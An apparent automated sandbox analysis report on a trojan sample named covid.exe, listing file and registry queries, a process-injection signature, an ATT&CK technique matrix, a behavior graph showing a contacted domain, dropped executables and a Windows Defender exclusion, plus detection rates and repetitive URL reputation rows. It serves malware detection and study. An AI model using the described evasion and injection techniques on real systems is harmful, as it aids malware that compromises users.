Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeCode function: 5_2_0040A272 WriteProcessMemory,GetVersionExW,CreateRemoteThread,5_2_0040A272
Source: C:\Users\user\Desktop\covid.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsWindows Management Instrumentation11Application Shimming1Exploitation for Privilege Escalation1Disable or Modify Tools11OS Credential DumpingFile and Directory Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsNative API1Windows Service1Application Shimming1Deobfuscate/Decode Files or Information1LSASS MemorySystem Information Discovery23Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsCommand and Scripting Interpreter1Logon Script (Windows)Access Token Manipulation1Obfuscated Files or Information2Security Account ManagerQuery Registry1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsService Execution2Logon Script (Mac)Windows Service1Timestomp1NTDSSecurity Software Discovery121Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol2SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptProcess Injection11Masquerading1LSA SecretsVirtualization/Sandbox Evasion141SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion141Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsAccess Token Manipulation1DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection11Proc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 393947 Sample: covid.exe Startdate: 20/04/2021 Architecture: WINDOWS Score: 68 39 Multi AV Scanner detection for domain / URL 2->39 41 Multi AV Scanner detection for submitted file 2->41 43 Machine Learning detection for sample 2->43 7 covid.exe 21 10 2->7         started        process3 dnsIp4 37 mmwrlridbhmibnr.ml 172.67.220.147, 49702, 80 CLOUDFLARENETUS United States 7->37 29 C:\Users\user\AppData\Local\...\covid.exe.log, ASCII 7->29 dropped 31 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe, PE32 7->31 dropped 33 C:\Users\user\AppData\...\AdvancedRun.exe, PE32 7->33 dropped 45 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 7->45 47 Adds a directory exclusion to Windows Defender 7->47 12 AdvancedRun.exe 1 7->12         started        14 powershell.exe 24 7->14         started        16 powershell.exe 26 7->16         started        18 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe 7->18         started        file5 signatures6 process7 process8 20 AdvancedRun.exe 12->20         started        23 conhost.exe 14->23         started        25 conhost.exe 16->25         started        27 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe 18->27         started        dnsIp9 35 192.168.2.1 unknown unknown 20->35

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
covid.exe41%VirustotalBrowse
covid.exe9%MetadefenderBrowse
covid.exe34%ReversingLabsWin32.Trojan.AgentTesla
covid.exe100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe3%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe0%ReversingLabs
C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe3%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe0%ReversingLabs

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
0.0.covid.exe.460000.0.unpack100%AviraHEUR/AGEN.1101074Download File

Domains

SourceDetectionScannerLabelLink
mmwrlridbhmibnr.ml5%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s458/0_GettyImages-1304940818.0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s458/0_GettyImages-1304940818.0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s458/0_GettyImages-1304940818.0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s458/0_GettyImages-1304940818.0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s458/1_FreeAgentPlayers.jpg0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s458/1_FreeAgentPlayers.jpg0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s458/1_FreeAgentPlayers.jpg0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s458/1_FreeAgentPlayers.jpg0%URL Reputationsafe
https://www.liverpool.com/liverpool-fc-news/features/liverpool-arsenal-klopp-lijnders-carabao-1716680%URL Reputationsafe
https://www.liverpool.com/liverpool-fc-news/features/liverpool-arsenal-klopp-lijnders-carabao-1716680%URL Reputationsafe
https://www.liverpool.com/liverpool-fc-news/features/liverpool-arsenal-klopp-lijnders-carabao-1716680%URL Reputationsafe
https://www.liverpool.com/liverpool-fc-news/features/liverpool-arsenal-klopp-lijnders-carabao-1716680%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-02-0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-02-0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-02-0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-02-0%URL Reputationsafe
https://i2-prod.liverpoolecho.co.uk/incoming/article17165318.ece/ALTERNATES/s615/2_GettyImages-118370%URL Reputationsafe
https://i2-prod.liverpoolecho.co.uk/incoming/article17165318.ece/ALTERNATES/s615/2_GettyImages-118370%URL Reputationsafe
https://i2-prod.liverpoolecho.co.uk/incoming/article17165318.ece/ALTERNATES/s615/2_GettyImages-118370%URL Reputationsafe
https://i2-prod.liverpoolecho.co.uk/incoming/article17165318.ece/ALTERNATES/s615/2_GettyImages-118370%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s220b/0_GettyImages-12737166900%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s220b/0_GettyImages-12737166900%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s220b/0_GettyImages-12737166900%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s220b/0_GettyImages-12737166900%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s180/0_GettyImages-1302496803.0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s180/0_GettyImages-1302496803.0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s180/0_GettyImages-1302496803.0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s180/0_GettyImages-1302496803.0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s270b/0_Salah-Goal-vs-Leeds.jp0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s270b/0_Salah-Goal-vs-Leeds.jp0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s270b/0_Salah-Goal-vs-Leeds.jp0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s270b/0_Salah-Goal-vs-Leeds.jp0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-0%URL Reputationsafe
https://www.liverpool.com/all-about/premier-league0%URL Reputationsafe
https://www.liverpool.com/all-about/premier-league0%URL Reputationsafe
https://www.liverpool.com/all-about/premier-league0%URL Reputationsafe
https://www.liverpool.com/all-about/premier-league0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s180/0_Salah-Pressing.jpg0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s180/0_Salah-Pressing.jpg0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s180/0_Salah-Pressing.jpg0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s180/0_Salah-Pressing.jpg0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s615/0_Curtis-10.png0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s615/0_Curtis-10.png0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s615/0_Curtis-10.png0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s615/0_Curtis-10.png0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s180/1_WhatsApp-Image-2021-03-0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s180/1_WhatsApp-Image-2021-03-0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s180/1_WhatsApp-Image-2021-03-0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s180/1_WhatsApp-Image-2021-03-0%URL Reputationsafe
https://www.liverpool.com/liverpool-fc-news/0%URL Reputationsafe
https://www.liverpool.com/liverpool-fc-news/0%URL Reputationsafe
https://www.liverpool.com/liverpool-fc-news/0%URL Reputationsafe
https://www.liverpool.com/liverpool-fc-news/0%URL Reputationsafe
https://www.liverpool.com/schedule/liverpool-arsenal-carabao-cup-klopp-171661540%URL Reputationsafe
https://www.liverpool.com/schedule/liverpool-arsenal-carabao-cup-klopp-171661540%URL Reputationsafe
https://www.liverpool.com/schedule/liverpool-arsenal-carabao-cup-klopp-171661540%URL Reputationsafe
https://www.liverpool.com/schedule/liverpool-arsenal-carabao-cup-klopp-171661540%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s615/0_GettyImages-1231353837.0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s615/0_GettyImages-1231353837.0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s615/0_GettyImages-1231353837.0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s615/0_GettyImages-1231353837.0%URL Reputationsafe
https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-199578500%URL Reputationsafe
https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-199578500%URL Reputationsafe
https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-199578500%URL Reputationsafe
https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-199578500%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s220b/0_WhatsApp-Image-2021-020%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s220b/0_WhatsApp-Image-2021-020%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s220b/0_WhatsApp-Image-2021-020%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s220b/0_WhatsApp-Image-2021-020%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s180/0_RobertsonCross1.jpg0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s180/0_RobertsonCross1.jpg0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s180/0_RobertsonCross1.jpg0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s180/0_RobertsonCross1.jpg0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s270b/0_Curtis-10.png0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s270b/0_Curtis-10.png0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s270b/0_Curtis-10.png0%URL Reputationsafe
